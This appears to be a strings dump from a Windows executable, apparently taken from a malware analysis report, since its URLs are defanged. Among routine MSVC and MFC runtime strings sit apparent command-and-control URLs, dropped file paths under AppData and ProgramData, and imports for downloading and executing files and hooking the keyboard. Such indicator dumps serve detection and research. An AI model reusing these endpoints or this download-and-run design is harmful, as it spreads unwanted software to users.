f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarscommandslistbox.cpp
@f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorpickerctrl.cpp
@f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorpickerctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcustomcolorspropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcustomcolorspropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxstandardcolorspropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxstandardcolorspropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorpropertysheet.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorpropertysheet.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dcprev.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dcprev.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrpt.c
f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrpt.c
f:\dd\vctools\crt_bld\self_x86\crt\src\onexit.c
f:\dd\vctools\crt_bld\self_x86\crt\src\onexit.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_file.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_file.c
f:\dd\vctools\crt_bld\self_x86\crt\src\setvbuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\setvbuf.c
Client hook allocation failure at file %hs line %d.
Client hook allocation failure at file %hs line %d.
Memory allocated at %hs(%d).
Memory allocated at %hs(%d).
Client hook re-allocation failure at file %hs line %d.
Client hook re-allocation failure at file %hs line %d.
HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.
HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.
CRT detected that the application wrote to memory after end of heap buffer.
CRT detected that the application wrote to memory after end of heap buffer.
HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.
HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.
CRT detected that the application wrote to memory before start of heap buffer.
CRT detected that the application wrote to memory before start of heap buffer.
CRT detected that the application wrote to a heap buffer that was freed.
CRT detected that the application wrote to a heap buffer that was freed.
crt block at 0x%p, subtype %x, %Iu bytes long.
crt block at 0x%p, subtype %x, %Iu bytes long.
client block at 0x%p, subtype %x, %Iu bytes long.
client block at 0x%p, subtype %x, %Iu bytes long.
%hs(%d) :
%hs(%d) :
#File Error#(%d) :
#File Error#(%d) :
Data: %s
Data: %s
_CrtDbgReport: String too long or IO Error
_CrtDbgReport: String too long or IO Error
Debug %s!
Debug %s!
Program: %s%s%s%s%s%s%s%s%s%s%s%s
Program: %s%s%s%s%s%s%s%s%s%s%s%s
f:\dd\vctools\crt_bld\self_x86\crt\src\thread.c
f:\dd\vctools\crt_bld\self_x86\crt\src\thread.c
f:\dd\vctools\crt_bld\self_x86\crt\src\osfinfo.c
f:\dd\vctools\crt_bld\self_x86\crt\src\osfinfo.c
%s(%d) : %s
%s(%d) : %s
_CrtDbgReport: String too long or Invalid characters in String
_CrtDbgReport: String too long or Invalid characters in String
f:\dd\vctools\crt_bld\self_x86\crt\src\mlock.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mlock.c
GetProcessWindowStation
GetProcessWindowStation
f:\dd\vctools\crt_bld\self_x86\crt\src\ioinit.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ioinit.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_getbuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_getbuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbctype.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbctype.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tidtable.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tidtable.c
f:\dd\vctools\crt_bld\self_x86\crt\src\setlocal.c
f:\dd\vctools\crt_bld\self_x86\crt\src\setlocal.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tzset.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tzset.c
f:\dd\vctools\crt_bld\self_x86\crt\src\gmtime.c
f:\dd\vctools\crt_bld\self_x86\crt\src\gmtime.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stdenvp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stdenvp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stdargv.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stdargv.c
f:\dd\vctools\crt_bld\self_x86\crt\src\a_env.c
f:\dd\vctools\crt_bld\self_x86\crt\src\a_env.c
f:\dd\vctools\crt_bld\self_x86\crt\src\inithelp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\inithelp.c
Run-Time Check Failure #%d - %s
Run-Time Check Failure #%d - %s
f:\dd\vctools\crt_bld\self_x86\crt\src\input.c
f:\dd\vctools\crt_bld\self_x86\crt\src\input.c
f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stream.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stream.c
f:\dd\vctools\crt_bld\self_x86\crt\src\read.c
f:\dd\vctools\crt_bld\self_x86\crt\src\read.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_sftbuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_sftbuf.c
operator
operator
f:\dd\vctools\crt_bld\self_x86\crt\src\inittime.c
f:\dd\vctools\crt_bld\self_x86\crt\src\inittime.c
f:\dd\vctools\crt_bld\self_x86\crt\src\initnum.c
f:\dd\vctools\crt_bld\self_x86\crt\src\initnum.c
f:\dd\vctools\crt_bld\self_x86\crt\src\initmon.c
f:\dd\vctools\crt_bld\self_x86\crt\src\initmon.c
f:\dd\vctools\crt_bld\self_x86\crt\src\initctyp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\initctyp.c
portuguese-brazilian
portuguese-brazilian
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
f:\dd\vctools\crt_bld\self_x86\crt\src\wtombenv.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wtombenv.c
f:\dd\vctools\crt_bld\self_x86\crt\src\setenv.c
f:\dd\vctools\crt_bld\self_x86\crt\src\setenv.c
%s_%0x
%s_%0x
%s(%d) :
%s(%d) :
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atlbase.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atlbase.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\locale0.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\locale0.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\xutility
f:\dd\vctools\crt_bld\self_x86\crt\src\xutility
f:\dd\vctools\crt_bld\self_x86\crt\src\_tolower.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_tolower.c
f:\dd\vctools\crt_bld\self_x86\crt\src\xmutex.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\xmutex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appmodul.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appmodul.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmain.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmain.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\strerror.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strerror.c
Visual C CRT: Not enough memory to complete call to strerror.
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\xlocale
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\xlocale
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\xiosbase
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\xiosbase
hXXp://159.203.127.87/nigma/index.php/api/check_version?data={"id":"1"}
hXXp://159.203.127.87/nigma/index.php/api/check_version?data={"id":"1"}
hXXp://demo1.geniesoftsystem.com/country_ip/getip.php
hXXp://demo1.geniesoftsystem.com/country_ip/getip.php
C:\ProgramData\country_data.txt
C:\ProgramData\country_data.txt
BrowserControlDemo.cpp
BrowserControlDemo.cpp
/AppData/Roaming/nigma/version_nigma.txt
/AppData/Roaming/nigma/version_nigma.txt
download_url
download_url
hXXp://
hXXp://
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\streambuf
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\streambuf
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlexcept.h
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlexcept.h
AtlThrow: hr = 0x%x
AtlThrow: hr = 0x%x
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\atlmfc\include\cstringt.h
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\atlmfc\include\cstringt.h
Warning: implicit LoadString(%u) failed
Warning: implicit LoadString(%u) failed
%Y-%m-%d %H:%M:%S
%Y-%m-%d %H:%M:%S
TimeZoneKeyName
TimeZoneKeyName
C:\ProgramData\nigma.txt
C:\ProgramData\nigma.txt
hXXp://demo1.geniesoftsystem.com/master/index.php/api/getdate
hXXp://demo1.geniesoftsystem.com/master/index.php/api/getdate
C:/ProgramData/installationlimit_data.txt
C:/ProgramData/installationlimit_data.txt
hXXp://demo1.geniesoftsystem.com/master/index.php/api/get_installation_detail?data={"country":"
hXXp://demo1.geniesoftsystem.com/master/index.php/api/get_installation_detail?data={"country":"
BrowserControlDemoDlg.cpp
BrowserControlDemoDlg.cpp
/AppData/Roaming/nigma/uninstaller.exe
/AppData/Roaming/nigma/uninstaller.exe
Advapi32.dll
Advapi32.dll
RegOpenKeyTransactedA
RegOpenKeyTransactedA
hXXp://demo1.geniesoftsystem.com/nigma/html/content.html
hXXp://demo1.geniesoftsystem.com/nigma/html/content.html
D:\Allwyn\Miami\Master(05Apr16)\Release\Master.pdb
D:\Allwyn\Miami\Master(05Apr16)\Release\Master.pdb
GetCPInfo
GetCPInfo
GetWindowsDirectoryA
GetWindowsDirectoryA
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
GetKeyState
GetKeyState
SetWindowsHookExA
SetWindowsHookExA
CreateDialogIndirectParamA
CreateDialogIndirectParamA
UnhookWindowsHookEx
UnhookWindowsHookEx
GetKeyNameTextA
GetKeyNameTextA
MapVirtualKeyA
MapVirtualKeyA
GetAsyncKeyState
GetAsyncKeyState
GetKeyboardLayout
GetKeyboardLayout
GetKeyboardState
GetKeyboardState
MapVirtualKeyExA
MapVirtualKeyExA
USER32.dll
USER32.dll
GetViewportOrgEx
GetViewportOrgEx
GetViewportExtEx
GetViewportExtEx
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GDI32.dll
GDI32.dll
MSIMG32.dll
MSIMG32.dll
COMDLG32.dll
COMDLG32.dll
WINSPOOL.DRV
WINSPOOL.DRV
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyA
RegEnumKeyA
RegEnumKeyExA
RegEnumKeyExA
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
COMCTL32.dll
COMCTL32.dll
SHLWAPI.dll
SHLWAPI.dll
OLEAUT32.dll
OLEAUT32.dll
oledlg.dll
oledlg.dll
URLDownloadToFileA
URLDownloadToFileA
urlmon.dll
urlmon.dll
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
DeleteUrlCacheEntry
DeleteUrlCacheEntry
WININET.dll
WININET.dll
OLEACC.dll
OLEACC.dll
IMM32.dll
IMM32.dll
WINMM.dll
WINMM.dll
.PAVCOleException@@
.PAVCOleException@@
.PAVCException@@
.PAVCException@@
.PAVCObject@@
.PAVCObject@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.PAVCInvalidArgException@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.PAVCUserException@@
.PAVCUserException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCResourceException@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.PAVCArchiveException@@
.PAVCArchiveException@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDV12@PBD@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDV12@PBD@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD_N_N@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD_N_N@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.?AVCMFCToolBarCmdUI@@
.?AVCMFCToolBarCmdUI@@
.PAVCFileException@@
.PAVCFileException@@
.PAVCOleDispatchException@@
.PAVCOleDispatchException@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDIChildWnd@@
.?AVCMDITabProxyWnd@@
.?AVCMDITabProxyWnd@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMDIFrameWnd@@
.?AVCMFCCmdUsageCount@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCObList@@PAV3@@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCObList@@PAV3@@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCColorBarCmdUI@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.?AV?$CMap@KKV?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCAcceleratorKey@@
.?AVCMDIClientAreaWnd@@
.?AVCMDIClientAreaWnd@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDHH@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDHH@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÃ
zcÃ
.?AVCCmdTarget@@
.?AVCCmdTarget@@
%Documents and Settings%\%current user%\Application Data\master\master.exe
%Documents and Settings%\%current user%\Application Data\master\master.exe
truePA
truePA
7$8(8,8084888
7$8(8,8084888
6 7$7(7,7
6 7$7(7,7
5'6[64748@8
5'6[64748@8
4(575\5]6(777_7
4(575\5]6(777_7
3>
3>
9$:(:,:0:4:
9$:(:,:0:4:
20>0-191
20>0-191
4%4U4h4w4
4%4U4h4w4
24383
24383
:!;4;$
:!;4;$
5o6
5o6
7?7(:7:9;
7?7(:7:9;
8#848>8^8
8#848>8^8
3/3(474$5
3/3(474$5
8%9U9r9
8%9U9r9
1$2C2R2_2
1$2C2R2_2
91:_:.;5;
91:_:.;5;
3%3U3H4U4
3%3U3H4U4
?6?;?@?|?
?6?;?@?|?
? ?$?(?,?
? ?$?(?,?
82878
82878
=%>,>(?0?
=%>,>(?0?
= =$=(=,=
= =$=(=,=
263f3
263f3
11K1U1v1{1
11K1U1v1{1
5 5$5(5,505
5 5$5(5,505
7 7$7(7,707
7 7$7(7,707
6 6$686
6 6$686
; ;$;(;,;0;4;|;
; ;$;(;,;0;4;|;
8 8$8(8,8084888
8 8$8(8,8084888
? ?$?(?,?0?4?8?
? ?$?(?,?0?4?8?
? ?$?(?,?0?
? ?$?(?,?0?
6 6$6(6,6064686
6 6$6(6,6064686
: :$:(:,:0:
: :$:(:,:0:
; ;$;(;,;0;
; ;$;(;,;0;
? ?$?(?,?0?4?8?@?
? ?$?(?,?0?4?8?@?
5(9,9094989
5(9,9094989
: :$:(:,:0:4:8:<:>
: :$:(:,:0:4:8:<:>
1 1$1(1,1014181
1 1$1(1,1014181
9,989\9|9
9,989\9|9
>,>8>\>|>
>,>8>\>|>
3 4@4`4|4
3 4@4`4|4
3$3@3`3|3
3$3@3`3|3
d:\sunita\download\jsoncpp-src-0.5.0\jsoncpp-src-0.5.0\src\lib_json\json_value.cpp
d:\sunita\download\jsoncpp-src-0.5.0\jsoncpp-src-0.5.0\src\lib_json\json_value.cpp
c:\program files\microsoft visual studio 10.0\vc\include\xstring
c:\program files\microsoft visual studio 10.0\vc\include\xstring
c:\program files\microsoft visual studio 10.0\vc\include\xtree
c:\program files\microsoft visual studio 10.0\vc\include\xtree
std::_Tree_const_iterator,class std::allocator >,0> > >::operator *
std::_Tree_const_iterator,class std::allocator >,0> > >::operator *
std::_Tree_const_iterator,class std::allocator >,0> > >::operator
std::_Tree_const_iterator,class std::allocator >,0> > >::operator
std::_Tree_const_iterator,class std::allocator >,0> > >::operator --
std::_Tree_const_iterator,class std::allocator >,0> > >::operator --
std::_Tree_const_iterator,class std::allocator >,0> > >::operator ==
std::_Tree_const_iterator,class std::allocator >,0> > >::operator ==
invalid operator
invalid operator
d:\sunita\download\jsoncpp-src-0.5.0\jsoncpp-src-0.5.0\src\lib_json\json_reader.cpp
d:\sunita\download\jsoncpp-src-0.5.0\jsoncpp-src-0.5.0\src\lib_json\json_reader.cpp
std::_Deque_const_iterator >::operator *
std::_Deque_const_iterator >::operator *
c:\program files\microsoft visual studio 10.0\vc\include\deque
c:\program files\microsoft visual studio 10.0\vc\include\deque
std::_Deque_const_iterator >::operator
std::_Deque_const_iterator >::operator
std::_Deque_const_iterator >::operator *
std::_Deque_const_iterator >::operator *
@std::_Deque_const_iterator >::operator --
@std::_Deque_const_iterator >::operator --
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlsimpstr.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlsimpstr.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlconv.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlconv.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlalloc.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlalloc.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcomcli.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcomcli.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atltransactionmanager.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atltransactionmanager.h
hhctrl.ocx
hhctrl.ocx
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlacc.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlacc.h
accKeyboardShortcut
accKeyboardShortcut
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcom.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcom.h
SHELL32.DLL
SHELL32.DLL
dwmapi.dll
dwmapi.dll
UxTheme.dll
UxTheme.dll
m_pColumnInfo[nColumn].ulColumnSize == sizeof(ctype)
m_pColumnInfo[nColumn].ulColumnSize == sizeof(ctype)
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlimage.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlimage.h
USER32.DLL
USER32.DLL
DIsIndexed()
DIsIndexed()
mscoree.dll
mscoree.dll
^RICHED20.DLL
^RICHED20.DLL
mode == _CRT_RPTHOOK_INSTALL || mode == _CRT_RPTHOOK_REMOVE
mode == _CRT_RPTHOOK_INSTALL || mode == _CRT_RPTHOOK_REMOVE
wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)
memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)
wcscpy_s(szExeName, 260, L"")
wcscpy_s(szExeName, 260, L"")
__crtMessageWindowW
__crtMessageWindowW
f:\dd\vctools\crt_bld\self_x86\crt\src\memcpy_s.c
f:\dd\vctools\crt_bld\self_x86\crt\src\memcpy_s.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fgetc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fgetc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fputc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fputc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc_nolock.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc_nolock.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\memmove_s.c
f:\dd\vctools\crt_bld\self_x86\crt\src\memmove_s.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbscmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbscmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fwrite.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fwrite.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fseeki64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fseeki64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fgetpos.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fgetpos.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fsetpos.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fsetpos.c
f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
_CrtCheckMemory()
_CrtCheckMemory()
_CrtIsValidHeapPointer(pUserData)
_CrtIsValidHeapPointer(pUserData)
_CrtSetDbgFlag
_CrtSetDbgFlag
(fNewBits==_CRTDBG_REPORT_FLAG) || ((fNewBits & 0x0ffff & ~(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_DELAY_FREE_MEM_DF | _CRTDBG_CHECK_ALWAYS_DF | _CRTDBG_CHECK_CRT_DF | _CRTDBG_LEAK_CHECK_DF) ) == 0)
(fNewBits==_CRTDBG_REPORT_FLAG) || ((fNewBits & 0x0ffff & ~(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_DELAY_FREE_MEM_DF | _CRTDBG_CHECK_ALWAYS_DF | _CRTDBG_CHECK_CRT_DF | _CRTDBG_LEAK_CHECK_DF) ) == 0)
_CrtMemCheckpoint
_CrtMemCheckpoint
f:\dd\vctools\crt_bld\self_x86\crt\src\fclose.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fclose.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strtol.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strtol.c
f:\dd\vctools\crt_bld\self_x86\crt\src\loctim64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\loctim64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strftime.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strftime.c
("Invalid MBCS character sequence passed to strftime",0)
("Invalid MBCS character sequence passed to strftime",0)
("Invalid MBCS character sequence passed into strftime",0)
("Invalid MBCS character sequence passed into strftime",0)
f:\dd\vctools\crt_bld\self_x86\crt\src\mktime64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mktime64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsstr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsstr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\assert.c
f:\dd\vctools\crt_bld\self_x86\crt\src\assert.c
f:\dd\vctools\crt_bld\self_x86\crt\src\sscanf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\sscanf.c
ekernel32.dll
ekernel32.dll
f:\dd\vctools\crt_bld\self_x86\crt\src\tcscpy_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\tcscpy_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\wmemcpy_s.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wmemcpy_s.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbschr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbschr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wcstol.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wcstol.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tcscat_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\tcscat_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\strdup.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strdup.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strnicmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strnicmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\vsprintf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\vsprintf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\xtoa.c
f:\dd\vctools\crt_bld\self_x86\crt\src\xtoa.c
i_CrtSetReportHook2
i_CrtSetReportHook2
strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")
strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")
strcpy_s(szExeName, 260, "")
strcpy_s(szExeName, 260, "")
__crtMessageWindowA
__crtMessageWindowA
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsinc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsinc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsicmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsicmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsrchr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsrchr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbscspn.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbscspn.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsspn.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsspn.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbcmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbcmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsicoll.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsicoll.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tcsncpy_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\tcsncpy_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\tsplitpath_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\tsplitpath_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\tmakepath_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\tmakepath_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsdec.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsdec.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsupr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsupr.c
